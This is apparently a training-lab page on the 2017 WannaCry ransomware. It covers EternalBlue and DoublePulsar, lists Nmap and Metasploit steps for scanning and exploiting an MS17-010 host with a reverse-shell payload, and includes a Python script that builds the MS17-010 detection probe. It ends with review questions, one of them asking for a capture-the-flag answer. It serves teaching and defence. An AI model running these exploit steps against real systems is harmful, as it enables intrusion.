WannaCry Ransomware

Overview

In May 2017 the ransomware worm WannaCry (also tracked as WannaCrypt or WCry) infected more than 200,000 systems in roughly 150 countries within days, with estimated damages in the hundreds of millions of dollars. Prominent victims included Boeing, Honda, the NHS of England and Scotland, and the University of Montreal. Each infected machine displayed a note demanding $300 in Bitcoin for decryption of the victim's files, with the price doubling to $600 after three days and a threat to delete the files after seven. On the day of the outbreak (12 May 2017) security researcher Marcus Hutchins noticed that the worm contacted a hardcoded, unregistered domain before spreading and registered it; because the sample stops propagating when that domain answers, the registration acted as a kill switch and halted new infections within hours. It did nothing for systems that were already encrypted, and hosts that could not reach the domain (for example, those with no direct internet access) were not protected by it.

Vulnerability Details

WannaCry spread using EternalBlue, an exploit for CVE-2017-0144, a flaw in how Microsoft's SMBv1 server handles specially crafted packets that allows unauthenticated remote code execution over TCP port 445. The exploit installs DoublePulsar, a kernel-mode backdoor implant that lives only in memory and leaves no file on disk; WannaCry then used it to inject its payload DLL into a user-mode process (lsass.exe) and start encrypting. Both tools are widely attributed to the NSA and were published by the group calling itself The Shadow Brokers on 14 April 2017. Microsoft had already fixed the bug in security bulletin MS17-010 on 14 March 2017, so by the time WannaCry appeared EternalBlue was no longer a zero-day: a patch had been available for almost two months, and the worm succeeded because so many systems had not applied it (out-of-support versions such as Windows XP and Server 2003 received an emergency patch only after the outbreak). The term "zero-day" refers to a vulnerability the vendor has had zero days to fix, one that is exploited before a patch exists. EternalBlue was a zero-day for as long as it was held privately, which is why its leak was so dangerous and why defenders had to react the day it became public.

Lab Terminal

In this terminal activity, students simulate how attackers exploited a critical SMB vulnerability to spread ransomware, mirroring the events of the 2017 WannaCry outbreak. The exercise demonstrates how the EternalBlue exploit used the SMBv1 flaw patched by MS17-010 (CVE-2017-0144) to gain remote code execution on unpatched Windows systems and deploy a payload. Using Nmap and Metasploit, students identify hosts with SMB exposed, verify that the target is vulnerable, and run the exploit in a controlled environment to see how little stands between an exposed, unpatched SMB service and a compromised host. The activity shows how unpatched systems and needless network exposure lead to devastating ransomware infections, and emphasizes the controls that would have stopped WannaCry: timely patching (MS17-010), disabling SMBv1, blocking port 445 at network boundaries, segmented networks, and proactive vulnerability management.

Instructions:

  • Use the help command to see all available commands.
  • The vulnerable machine's IP is 192.168.1.103.
  • Begin with nmap -p 139,445 192.168.1.0/24 to find hosts on the subnet exposing SMB (NetBIOS session service on 139, direct SMB on 445).
  • Launch Metasploit with msfconsole, then load the vulnerability scanner with use auxiliary/scanner/smb/smb_ms17_010.
  • Set the target with set RHOSTS 192.168.1.103 (RHOST is accepted as an alias) and run the check with run; a vulnerable target is reported as "Host is likely VULNERABLE to MS17-010!".
  • Switch to the exploit with use exploit/windows/smb/ms17_010_eternalblue, set the target again with set RHOSTS 192.168.1.103 (module options do not carry over between modules), choose the payload with set payload generic/shell_reverse_tcp, confirm with show options that LHOST points at your own machine, and execute with exploit.
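The "verify the vulnerability" step above is a single SMBv1 request and a status-code check. The following is an added example, not part of the lab or of Metasploit, that builds the probe used by Nmap's smb-vuln-ms17-010 script and Metasploit's smb_ms17_010 scanner and classifies a response offline. Real scanners first negotiate the dialect, set up an anonymous session and connect to the IPC$ share; those steps are omitted here, so the TID and UID values, the Flags/Flags2 bytes and every response packet are constructed placeholders for illustration and nothing is sent on the wire.

```python
"""Added example (not lab or Metasploit code): the MS17-010 SMBv1 probe.

After session setup and a tree connect to IPC$, the scanner sends an
SMB_COM_TRANSACTION2 request whose only setup word is the unimplemented
SESSION_SETUP (0x0014) subcommand.  An unpatched host answers
STATUS_INSUFF_SERVER_RESOURCES; a patched one answers STATUS_NOT_IMPLEMENTED
or STATUS_ACCESS_DENIED.  DoublePulsar, if implanted, answers the same probe
with the Multiplex ID raised from 0x41 to 0x51.  All responses below are
constructed by hand; TID/UID/flag values are placeholders."""
import struct

SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x0014
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_NOT_IMPLEMENTED = 0xC0000002
STATUS_ACCESS_DENIED = 0xC0000022
PROBE_MID = 0x41          # Multiplex ID sent in the probe
DOUBLEPULSAR_MID = 0x51   # Multiplex ID the implant echoes back

SMB1_HDR = "<4sBIBHHQHHHHH"   # 32-byte SMB1 header (MS-CIFS 2.2.3.1), little-endian


def smb1_header(command, tid, uid, mid, status=0):
    return struct.pack(SMB1_HDR, b"\xffSMB", command, status,
                       0x18,    # Flags: case-insensitive, canonical pathnames
                       0xC007,  # Flags2: Unicode, NT status codes, long names
                       0,       # PIDHigh
                       0,       # SecurityFeatures (no signing)
                       0,       # Reserved
                       tid, 0xFEFF, uid, mid)   # PIDLow is arbitrary


def netbios(smb):
    # NetBIOS session message: type 0x00 followed by a 3-byte big-endian length
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_ms17_010_probe(tid, uid, mid=PROBE_MID):
    setup = struct.pack("<H", TRANS2_SESSION_SETUP)
    # Offsets count from the start of the SMB header: 32 (header) + 1 (WordCount)
    # + 28 (14 parameter words) + 2 (setup) + 2 (ByteCount) + 1 (Name) = 66
    offset = 32 + 1 + 28 + len(setup) + 2 + 1
    params = struct.pack("<HHHHBBHIHHHHHBB",
                         0, 0,            # TotalParameterCount, TotalDataCount
                         0xFFFF, 0xFFFF,  # MaxParameterCount, MaxDataCount
                         0, 0,            # MaxSetupCount, Reserved1
                         0,               # Flags
                         0,               # Timeout
                         0,               # Reserved2
                         0, offset,       # ParameterCount, ParameterOffset
                         0, offset,       # DataCount, DataOffset
                         1, 0)            # SetupCount, Reserved3
    body = bytes([14 + 1]) + params + setup      # WordCount = 14 + SetupCount
    body += struct.pack("<H", 1) + b"\x00"       # ByteCount = 1, Name = "\0"
    return netbios(smb1_header(SMB_COM_TRANSACTION2, tid, uid, mid) + body)


def parse_smb1(data):
    if len(data) < 36 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    if int.from_bytes(data[1:4], "big") != len(data) - 4:
        raise ValueError("NetBIOS length does not match payload")
    fields = struct.unpack(SMB1_HDR, data[4:36])
    if fields[0] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    return {"command": fields[1], "status": fields[2],
            "tid": fields[8], "uid": fields[10], "mid": fields[11]}


def classify_probe_response(data):
    """Return 'vulnerable', 'patched', 'doublepulsar' or 'unknown'."""
    hdr = parse_smb1(data)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "unknown"
    if hdr["mid"] == DOUBLEPULSAR_MID:
        return "doublepulsar"
    if hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"
    if hdr["status"] in (STATUS_NOT_IMPLEMENTED, STATUS_ACCESS_DENIED):
        return "patched"
    return "unknown"


def fake_response(status, mid=PROBE_MID, command=SMB_COM_TRANSACTION2):
    # Constructed error response: header, then WordCount=0 and ByteCount=0
    return netbios(smb1_header(command, 0x0800, 0x0800, mid, status) + b"\x00\x00\x00")


if __name__ == "__main__":
    print("probe:", build_ms17_010_probe(tid=0x0800, uid=0x0800).hex())
    samples = [("unpatched", fake_response(STATUS_INSUFF_SERVER_RESOURCES)),
               ("patched", fake_response(STATUS_NOT_IMPLEMENTED)),
               ("implanted", fake_response(STATUS_NOT_IMPLEMENTED, mid=DOUBLEPULSAR_MID))]
    for name, resp in samples:
        print(f"{name:>10}: {classify_probe_response(resp)}")
```

The check is safe to run against production hosts because the subcommand is never executed; it is the same request the Metasploit scanner sends before it prints "Host is likely VULNERABLE to MS17-010!", and a 0x51 Multiplex ID in the reply is the signature the scanner uses to report a DoublePulsar implant.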

Resources

Learn more about the commands being utilized:

Review Questions

What was the primary method used by WannaCry to encrypt victims' data?
What type of software was WannaCry?
What was the role of DoublePulsar in the WannaCry attack?
How was WannaCry's spread significantly reduced?
What could have prevented the WannaCry infection?
What is the hidden flag after exploiting the vulnerable machine?